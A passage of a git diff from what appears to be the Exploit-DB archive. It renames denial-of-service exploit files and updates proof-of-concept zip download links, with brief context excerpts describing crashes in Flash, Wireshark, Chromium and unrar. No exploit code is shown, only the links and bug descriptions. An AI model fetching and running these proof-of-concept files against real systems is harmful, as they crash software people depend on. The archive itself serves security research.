100% rename from platforms/multiple/dos/37990.txt rename to exploits/multiple/dos/37990.txt diff --git a/platforms/multiple/dos/38021.pl b/exploits/multiple/dos/38021.pl similarity index 100% rename from platforms/multiple/dos/38021.pl rename to exploits/multiple/dos/38021.pl diff --git a/platforms/multiple/dos/38038.txt b/exploits/multiple/dos/38038.txt similarity index 100% rename from platforms/multiple/dos/38038.txt rename to exploits/multiple/dos/38038.txt diff --git a/platforms/multiple/dos/38205.py b/exploits/multiple/dos/38205.py similarity index 100% rename from platforms/multiple/dos/38205.py rename to exploits/multiple/dos/38205.py diff --git a/platforms/multiple/dos/38208.py b/exploits/multiple/dos/38208.py similarity index 100% rename from platforms/multiple/dos/38208.py rename to exploits/multiple/dos/38208.py diff --git a/platforms/multiple/dos/38249.txt b/exploits/multiple/dos/38249.txt similarity index 100% rename from platforms/multiple/dos/38249.txt rename to exploits/multiple/dos/38249.txt diff --git a/platforms/multiple/dos/383.c b/exploits/multiple/dos/383.c similarity index 100% rename from platforms/multiple/dos/383.c rename to exploits/multiple/dos/383.c diff --git a/platforms/multiple/dos/38364.txt b/exploits/multiple/dos/38364.txt similarity index 100% rename from platforms/multiple/dos/38364.txt rename to exploits/multiple/dos/38364.txt diff --git a/platforms/multiple/dos/38420.txt b/exploits/multiple/dos/38420.txt similarity index 100% rename from platforms/multiple/dos/38420.txt rename to exploits/multiple/dos/38420.txt diff --git a/platforms/multiple/dos/38490.txt b/exploits/multiple/dos/38490.txt similarity index 97% rename from platforms/multiple/dos/38490.txt rename to exploits/multiple/dos/38490.txt index df655ce9f..f9aac080e 100644 --- a/platforms/multiple/dos/38490.txt +++ b/exploits/multiple/dos/38490.txt @@ -9,4 +9,4 @@ This bug is in the AVM serializer (http://hg.mozilla.org/tamarin-redux/file/5571 One challenge with the bug is actually creating a SWF which can hit this code, as usually overriding a defined method will lead to an illegal override exception. The 0-day author did this differently than I did. The code where all class properties (methods, internal classes, variables, etc.) are resolved is in http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/Traits.cpp. You can see on line 813 that a check that no two properties of a class have the same name is commented out due to some legitimate SWFs doing that. This means that a SWF can have a variable with the same name as a method (overriding a method with less restrictive method is still illegal), which is how my PoC overrode the method. The 0-day did something slightly different, it put the redefinition of writeExternal in a different public namespace than the original definition of writeExternal. This has the benefit that the ActionScript will compile and hit the bug without modification. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38490.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38490.zip \ No newline at end of file diff --git a/platforms/multiple/dos/3851.c b/exploits/multiple/dos/3851.c similarity index 100% rename from platforms/multiple/dos/3851.c rename to exploits/multiple/dos/3851.c diff --git a/platforms/multiple/dos/38538.py b/exploits/multiple/dos/38538.py similarity index 100% rename from platforms/multiple/dos/38538.py rename to exploits/multiple/dos/38538.py diff --git a/platforms/multiple/dos/38595.txt b/exploits/multiple/dos/38595.txt similarity index 100% rename from platforms/multiple/dos/38595.txt rename to exploits/multiple/dos/38595.txt diff --git a/platforms/multiple/dos/38616.txt b/exploits/multiple/dos/38616.txt similarity index 100% rename from platforms/multiple/dos/38616.txt rename to exploits/multiple/dos/38616.txt diff --git a/platforms/multiple/dos/38623.html b/exploits/multiple/dos/38623.html similarity index 100% rename from platforms/multiple/dos/38623.html rename to exploits/multiple/dos/38623.html diff --git a/platforms/multiple/dos/38626.py b/exploits/multiple/dos/38626.py similarity index 100% rename from platforms/multiple/dos/38626.py rename to exploits/multiple/dos/38626.py diff --git a/platforms/multiple/dos/38662.txt b/exploits/multiple/dos/38662.txt similarity index 97% rename from platforms/multiple/dos/38662.txt rename to exploits/multiple/dos/38662.txt index fc4ac8b46..8d6864b5a 100644 --- a/platforms/multiple/dos/38662.txt +++ b/exploits/multiple/dos/38662.txt @@ -108,4 +108,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): The issue was reported in https://savannah.nongnu.org/bugs/?46379. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38662.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38662.zip \ No newline at end of file diff --git a/platforms/multiple/dos/3871.html b/exploits/multiple/dos/3871.html similarity index 100% rename from platforms/multiple/dos/3871.html rename to exploits/multiple/dos/3871.html diff --git a/platforms/multiple/dos/38779.py b/exploits/multiple/dos/38779.py similarity index 100% rename from platforms/multiple/dos/38779.py rename to exploits/multiple/dos/38779.py diff --git a/platforms/multiple/dos/38798.txt b/exploits/multiple/dos/38798.txt similarity index 100% rename from platforms/multiple/dos/38798.txt rename to exploits/multiple/dos/38798.txt diff --git a/platforms/multiple/dos/38930.txt b/exploits/multiple/dos/38930.txt similarity index 93% rename from platforms/multiple/dos/38930.txt rename to exploits/multiple/dos/38930.txt index f5e9fcf29..a4d2bd95d 100644 --- a/platforms/multiple/dos/38930.txt +++ b/exploits/multiple/dos/38930.txt @@ -5,4 +5,4 @@ The attached file crashes in CmdExtract::UnstoreFile because the signed int64 De I observed this crash in Avast Antivirus, but the origin of the code appears to be the unrar source distribution. I imagine many other antiviruses will be affected, and presumably WinRAR and other archivers. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38930.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38930.zip \ No newline at end of file diff --git a/platforms/multiple/dos/38931.txt b/exploits/multiple/dos/38931.txt similarity index 96% rename from platforms/multiple/dos/38931.txt rename to exploits/multiple/dos/38931.txt index d59d55f0d..d273f23c3 100644 --- a/platforms/multiple/dos/38931.txt +++ b/exploits/multiple/dos/38931.txt @@ -23,4 +23,4 @@ $7 = 0xe73f181f $8 = 0x1060 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38931.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38931.zip \ No newline at end of file diff --git a/platforms/multiple/dos/38932.txt b/exploits/multiple/dos/38932.txt similarity index 87% rename from platforms/multiple/dos/38932.txt rename to exploits/multiple/dos/38932.txt index 139e039e0..582fe7111 100644 --- a/platforms/multiple/dos/38932.txt +++ b/exploits/multiple/dos/38932.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=551 The attached Microsoft Access Database causes JetDb::IsExploited4x to be called, which contains an unbounded search for objects. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38932.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38932.zip \ No newline at end of file diff --git a/platforms/multiple/dos/38933.txt b/exploits/multiple/dos/38933.txt similarity index 96% rename from platforms/multiple/dos/38933.txt rename to exploits/multiple/dos/38933.txt index bdf65cea3..0a438be70 100644 --- a/platforms/multiple/dos/38933.txt +++ b/exploits/multiple/dos/38933.txt @@ -29,4 +29,4 @@ ntdll!RtlpDeCommitFreeBlock+0x146: #12 0x0805498c in engine_scan () Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38933.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38933.zip \ No newline at end of file diff --git a/platforms/multiple/dos/38939.c b/exploits/multiple/dos/38939.c similarity index 100% rename from platforms/multiple/dos/38939.c rename to exploits/multiple/dos/38939.c diff --git a/platforms/multiple/dos/38940.c b/exploits/multiple/dos/38940.c similarity index 100% rename from platforms/multiple/dos/38940.c rename to exploits/multiple/dos/38940.c diff --git a/platforms/multiple/dos/38969.txt b/exploits/multiple/dos/38969.txt similarity index 93% rename from platforms/multiple/dos/38969.txt rename to exploits/multiple/dos/38969.txt index 3439b6b2e..515b51204 100644 --- a/platforms/multiple/dos/38969.txt +++ b/exploits/multiple/dos/38969.txt @@ -6,4 +6,4 @@ A sample swf is attached. ActionScript code is also attached, but it does not co Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38969.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38969.zip \ No newline at end of file diff --git a/platforms/multiple/dos/38970.txt b/exploits/multiple/dos/38970.txt similarity index 95% rename from platforms/multiple/dos/38970.txt rename to exploits/multiple/dos/38970.txt index e102f8846..afebdfda7 100644 --- a/platforms/multiple/dos/38970.txt +++ b/exploits/multiple/dos/38970.txt @@ -16,4 +16,4 @@ To reproduce the issue, load objectencoding.swf. PoC code is also attached. To u Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38970.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38970.zip \ No newline at end of file diff --git a/platforms/multiple/dos/38992.txt b/exploits/multiple/dos/38992.txt similarity index 96% rename from platforms/multiple/dos/38992.txt rename to exploits/multiple/dos/38992.txt index 9dc30d530..bfa517f14 100644 --- a/platforms/multiple/dos/38992.txt +++ b/exploits/multiple/dos/38992.txt @@ -60,4 +60,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11798. Attached is a file which triggers the crash. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38992.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38992.zip \ No newline at end of file diff --git a/platforms/multiple/dos/38993.txt b/exploits/multiple/dos/38993.txt similarity index 97% rename from platforms/multiple/dos/38993.txt rename to exploits/multiple/dos/38993.txt index f992aba01..a31515f6e 100644 --- a/platforms/multiple/dos/38993.txt +++ b/exploits/multiple/dos/38993.txt @@ -91,4 +91,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38993.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38993.zip \ No newline at end of file diff --git a/platforms/multiple/dos/38994.txt b/exploits/multiple/dos/38994.txt similarity index 97% rename from platforms/multiple/dos/38994.txt rename to exploits/multiple/dos/38994.txt index 6e9a96796..a18e3737f 100644 --- a/platforms/multiple/dos/38994.txt +++ b/exploits/multiple/dos/38994.txt @@ -45,4 +45,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38994.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38994.zip \ No newline at end of file diff --git a/platforms/multiple/dos/38995.txt b/exploits/multiple/dos/38995.txt similarity index 98% rename from platforms/multiple/dos/38995.txt rename to exploits/multiple/dos/38995.txt index 535c0d093..d6fe16eef 100644 --- a/platforms/multiple/dos/38995.txt +++ b/exploits/multiple/dos/38995.txt @@ -251,4 +251,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38995.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38995.zip \ No newline at end of file diff --git a/platforms/multiple/dos/38996.txt b/exploits/multiple/dos/38996.txt similarity index 97% rename from platforms/multiple/dos/38996.txt rename to exploits/multiple/dos/38996.txt index 7f237cbb7..6bc088e1f 100644 --- a/platforms/multiple/dos/38996.txt +++ b/exploits/multiple/dos/38996.txt @@ -96,4 +96,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38996.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38996.zip \ No newline at end of file diff --git a/platforms/multiple/dos/38997.txt b/exploits/multiple/dos/38997.txt similarity index 97% rename from platforms/multiple/dos/38997.txt rename to exploits/multiple/dos/38997.txt index 37a2fcf5f..b33c88355 100644 --- a/platforms/multiple/dos/38997.txt +++ b/exploits/multiple/dos/38997.txt @@ -63,4 +63,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38997.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38997.zip \ No newline at end of file diff --git a/platforms/multiple/dos/38998.txt b/exploits/multiple/dos/38998.txt similarity index 97% rename from platforms/multiple/dos/38998.txt rename to exploits/multiple/dos/38998.txt index 80e10eb07..8b09121db 100644 --- a/platforms/multiple/dos/38998.txt +++ b/exploits/multiple/dos/38998.txt @@ -49,4 +49,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38998.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38998.zip \ No newline at end of file diff --git a/platforms/multiple/dos/38999.txt b/exploits/multiple/dos/38999.txt similarity index 98% rename from platforms/multiple/dos/38999.txt rename to exploits/multiple/dos/38999.txt index c6518d217..b18e55db8 100644 --- a/platforms/multiple/dos/38999.txt +++ b/exploits/multiple/dos/38999.txt @@ -78,4 +78,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38999.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38999.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39000.txt b/exploits/multiple/dos/39000.txt similarity index 97% rename from platforms/multiple/dos/39000.txt rename to exploits/multiple/dos/39000.txt index 35079b75f..d323aaf0e 100644 --- a/platforms/multiple/dos/39000.txt +++ b/exploits/multiple/dos/39000.txt @@ -90,4 +90,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39000.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39000.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39001.txt b/exploits/multiple/dos/39001.txt similarity index 96% rename from platforms/multiple/dos/39001.txt rename to exploits/multiple/dos/39001.txt index d188b14ac..ddeeda9d2 100644 --- a/platforms/multiple/dos/39001.txt +++ b/exploits/multiple/dos/39001.txt @@ -58,4 +58,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39001.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39001.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39002.txt b/exploits/multiple/dos/39002.txt similarity index 97% rename from platforms/multiple/dos/39002.txt rename to exploits/multiple/dos/39002.txt index b31b481a3..6d16662e1 100644 --- a/platforms/multiple/dos/39002.txt +++ b/exploits/multiple/dos/39002.txt @@ -102,4 +102,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39002.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39002.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39003.txt b/exploits/multiple/dos/39003.txt similarity index 97% rename from platforms/multiple/dos/39003.txt rename to exploits/multiple/dos/39003.txt index a077509ba..2446a9df3 100644 --- a/platforms/multiple/dos/39003.txt +++ b/exploits/multiple/dos/39003.txt @@ -103,4 +103,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39003.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39003.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39004.txt b/exploits/multiple/dos/39004.txt similarity index 96% rename from platforms/multiple/dos/39004.txt rename to exploits/multiple/dos/39004.txt index 654e03b61..fad99ce82 100644 --- a/platforms/multiple/dos/39004.txt +++ b/exploits/multiple/dos/39004.txt @@ -61,4 +61,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39004.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39004.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39005.txt b/exploits/multiple/dos/39005.txt similarity index 97% rename from platforms/multiple/dos/39005.txt rename to exploits/multiple/dos/39005.txt index 0f02593fa..4c7cc3e1b 100644 --- a/platforms/multiple/dos/39005.txt +++ b/exploits/multiple/dos/39005.txt @@ -87,4 +87,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39005.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39005.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39006.txt b/exploits/multiple/dos/39006.txt similarity index 96% rename from platforms/multiple/dos/39006.txt rename to exploits/multiple/dos/39006.txt index 5539c40f7..8c6c37492 100644 --- a/platforms/multiple/dos/39006.txt +++ b/exploits/multiple/dos/39006.txt @@ -66,4 +66,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39006.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39006.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39039.txt b/exploits/multiple/dos/39039.txt similarity index 96% rename from platforms/multiple/dos/39039.txt rename to exploits/multiple/dos/39039.txt index 87532c365..ee1b95141 100644 --- a/platforms/multiple/dos/39039.txt +++ b/exploits/multiple/dos/39039.txt @@ -64,4 +64,4 @@ and visit the attached html page, with the attached image in the same directory. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39039.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39039.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39076.txt b/exploits/multiple/dos/39076.txt similarity index 97% rename from platforms/multiple/dos/39076.txt rename to exploits/multiple/dos/39076.txt index 0a478c71c..f0ce47953 100644 --- a/platforms/multiple/dos/39076.txt +++ b/exploits/multiple/dos/39076.txt @@ -62,4 +62,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39076.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39076.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39077.txt b/exploits/multiple/dos/39077.txt similarity index 97% rename from platforms/multiple/dos/39077.txt rename to exploits/multiple/dos/39077.txt index fc63e55f7..57039dc0f 100644 --- a/platforms/multiple/dos/39077.txt +++ b/exploits/multiple/dos/39077.txt @@ -82,4 +82,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39077.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39077.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39082.txt b/exploits/multiple/dos/39082.txt similarity index 100% rename from platforms/multiple/dos/39082.txt rename to exploits/multiple/dos/39082.txt diff --git a/platforms/multiple/dos/39162.txt b/exploits/multiple/dos/39162.txt similarity index 98% rename from platforms/multiple/dos/39162.txt rename to exploits/multiple/dos/39162.txt index 3401a936a..7794c776c 100644 --- a/platforms/multiple/dos/39162.txt +++ b/exploits/multiple/dos/39162.txt @@ -92,4 +92,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39162.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39162.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39163.txt b/exploits/multiple/dos/39163.txt similarity index 97% rename from platforms/multiple/dos/39163.txt rename to exploits/multiple/dos/39163.txt index e4b41ee8d..c7f3b2a80 100644 --- a/platforms/multiple/dos/39163.txt +++ b/exploits/multiple/dos/39163.txt @@ -80,4 +80,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39163.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39163.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39164.txt b/exploits/multiple/dos/39164.txt similarity index 98% rename from platforms/multiple/dos/39164.txt rename to exploits/multiple/dos/39164.txt index 77b471d36..1fcaf8273 100644 --- a/platforms/multiple/dos/39164.txt +++ b/exploits/multiple/dos/39164.txt @@ -55,4 +55,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39164.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39164.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39165.txt b/exploits/multiple/dos/39165.txt similarity index 97% rename from platforms/multiple/dos/39165.txt rename to exploits/multiple/dos/39165.txt index 2f4cace14..9d9b3ae1b 100644 --- a/platforms/multiple/dos/39165.txt +++ b/exploits/multiple/dos/39165.txt @@ -80,4 +80,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39165.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39165.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39169.pl b/exploits/multiple/dos/39169.pl similarity index 100% rename from platforms/multiple/dos/39169.pl rename to exploits/multiple/dos/39169.pl diff --git a/platforms/multiple/dos/39177.py b/exploits/multiple/dos/39177.py similarity index 100% rename from platforms/multiple/dos/39177.py rename to exploits/multiple/dos/39177.py diff --git a/platforms/multiple/dos/39182.py b/exploits/multiple/dos/39182.py similarity index 100% rename from platforms/multiple/dos/39182.py rename to exploits/multiple/dos/39182.py diff --git a/platforms/multiple/dos/39219.txt b/exploits/multiple/dos/39219.txt similarity index 87% rename from platforms/multiple/dos/39219.txt rename to exploits/multiple/dos/39219.txt index 6341167fd..a36ef1446 100644 --- a/platforms/multiple/dos/39219.txt +++ b/exploits/multiple/dos/39219.txt @@ -4,4 +4,4 @@ The attached swf file causes an out-of-bounds memset in BlurFilter processing. N Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39219.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39219.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39321.txt b/exploits/multiple/dos/39321.txt similarity index 98% rename from platforms/multiple/dos/39321.txt rename to exploits/multiple/dos/39321.txt index 3c0a1bfd0..74eaffb95 100644 --- a/platforms/multiple/dos/39321.txt +++ b/exploits/multiple/dos/39321.txt @@ -99,4 +99,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39321.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39321.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39322.txt b/exploits/multiple/dos/39322.txt similarity index 98% rename from platforms/multiple/dos/39322.txt rename to exploits/multiple/dos/39322.txt index 947d8985c..a139bacf5 100644 --- a/platforms/multiple/dos/39322.txt +++ b/exploits/multiple/dos/39322.txt @@ -105,4 +105,4 @@ The crash was reported at https://code.google.com/p/chromium/issues/detail?id=55 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39322.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39322.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39323.txt b/exploits/multiple/dos/39323.txt similarity index 96% rename from platforms/multiple/dos/39323.txt rename to exploits/multiple/dos/39323.txt index 95cf37885..e5b19de6e 100644 --- a/platforms/multiple/dos/39323.txt +++ b/exploits/multiple/dos/39323.txt @@ -61,4 +61,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39323.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39323.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39324.txt b/exploits/multiple/dos/39324.txt similarity index 97% rename from platforms/multiple/dos/39324.txt rename to exploits/multiple/dos/39324.txt index 8b0f52e23..71113de41 100644 --- a/platforms/multiple/dos/39324.txt +++ b/exploits/multiple/dos/39324.txt @@ -109,4 +109,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39324.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39324.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39325.txt b/exploits/multiple/dos/39325.txt similarity index 97% rename from platforms/multiple/dos/39325.txt rename to exploits/multiple/dos/39325.txt index 51af6a2c1..a83b13c33 100644 --- a/platforms/multiple/dos/39325.txt +++ b/exploits/multiple/dos/39325.txt @@ -85,4 +85,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39325.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39325.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39326.txt b/exploits/multiple/dos/39326.txt similarity index 97% rename from platforms/multiple/dos/39326.txt rename to exploits/multiple/dos/39326.txt index 9310c9ac7..f331af586 100644 --- a/platforms/multiple/dos/39326.txt +++ b/exploits/multiple/dos/39326.txt @@ -60,4 +60,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39326.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39326.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39327.txt b/exploits/multiple/dos/39327.txt similarity index 98% rename from platforms/multiple/dos/39327.txt rename to exploits/multiple/dos/39327.txt index 5ebc4ffd4..805628568 100644 --- a/platforms/multiple/dos/39327.txt +++ b/exploits/multiple/dos/39327.txt @@ -129,4 +129,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39327.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39327.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39358.txt b/exploits/multiple/dos/39358.txt similarity index 97% rename from platforms/multiple/dos/39358.txt rename to exploits/multiple/dos/39358.txt index fb16f985b..ed47f5967 100644 --- a/platforms/multiple/dos/39358.txt +++ b/exploits/multiple/dos/39358.txt @@ -96,4 +96,4 @@ state of the stack. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39358.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39358.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39365.c b/exploits/multiple/dos/39365.c similarity index 100% rename from platforms/multiple/dos/39365.c rename to exploits/multiple/dos/39365.c diff --git a/platforms/multiple/dos/39366.c b/exploits/multiple/dos/39366.c similarity index 100% rename from platforms/multiple/dos/39366.c rename to exploits/multiple/dos/39366.c diff --git a/platforms/multiple/dos/39377.c b/exploits/multiple/dos/39377.c similarity index 100% rename from platforms/multiple/dos/39377.c rename to exploits/multiple/dos/39377.c diff --git a/platforms/multiple/dos/39378.c b/exploits/multiple/dos/39378.c similarity index 100% rename from platforms/multiple/dos/39378.c rename to exploits/multiple/dos/39378.c diff --git a/platforms/multiple/dos/39379.txt b/exploits/multiple/dos/39379.txt similarity index 96% rename from platforms/multiple/dos/39379.txt rename to exploits/multiple/dos/39379.txt index fa3e3f29d..cb1f520ef 100644 --- a/platforms/multiple/dos/39379.txt +++ b/exploits/multiple/dos/39379.txt @@ -180,4 +180,4 @@ Guessing that this affects iOS too but haven't tested. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39379.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39379.zip \ No newline at end of file diff --git a/platforms/multiple/dos/39401.txt b/exploits/multiple/dos/39401.txt similarity index 98% rename from platforms/multiple/dos/39401.txt rename to exploits/multiple/dos/39401.txt index f7804863e..6af0095b9 100644 --- a/platforms/multiple/dos/39401.txt 